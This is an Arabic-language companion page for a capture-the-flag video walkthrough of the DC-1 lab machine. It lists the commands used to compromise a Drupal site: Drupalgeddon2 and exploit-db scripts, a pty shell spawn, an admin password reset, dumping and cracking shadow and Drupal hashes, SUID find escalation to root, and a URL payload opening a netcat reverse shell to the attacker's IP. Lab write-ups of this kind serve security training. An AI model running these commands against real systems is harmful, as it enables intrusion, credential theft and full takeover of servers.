CTF - dc-1 بالعربي

في هذه السلسلة من الفيديوهات سنشاهد كيفية اختراق نظام
Drupal CMS

سنحصل على كلمة المرور المشفرة من
MySQL لكسر تشفيرها لاحقًا.

ثم سنحصل على صلاحيات كاملة لمستخدم
root

الجزء الأول

الجزء الثاني

الجزء الثالث

الأوامر المستخدمة في الجزء الأول

  • nmap -p 80 --script http-drupal-enum
  • git clone https://github.com/droope/droopescan.git
  • sudo pip install -r requirements.txt
  • ./droopescan
  • use exploit/unix/webapp/drupal_drupalgeddon2
  • python -c ‘import pty; pty.spawn("/bin/bash")’
  • mysql -u dbuser -p
  • drush upwd admin --password=P@ssw0rd
  • find / -perm -4000
  • find / -name shadow -exec cat {} ;
  • find . -name “*” -print -exec ls /root {} ;
  • find / -name thefinalflag.txt -exec cat {} ;
  • find / -name flag4.txt -exec ‘/bin/sh’ ;

الأوامر المستخدمة في الجزء الثاني

  • hashcat --help | grep -i drupal
  • hashcat -m 7900 dbhashes.txt /usr/share/wordlists/rockyou.txt
  • unshadow passwd shadow > crackme
  • john crackme

الأوامر المستخدمة في الجزء الثالث

  • ruby /usr/share/exploitdb/exploits/php/webapps/44449.rb http://Target_IP
  • python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://Target_IP -u -p
  • http://Target_IP/node/4?cmd=nc%20-e%20/bin/bash%20Kali_IP%201234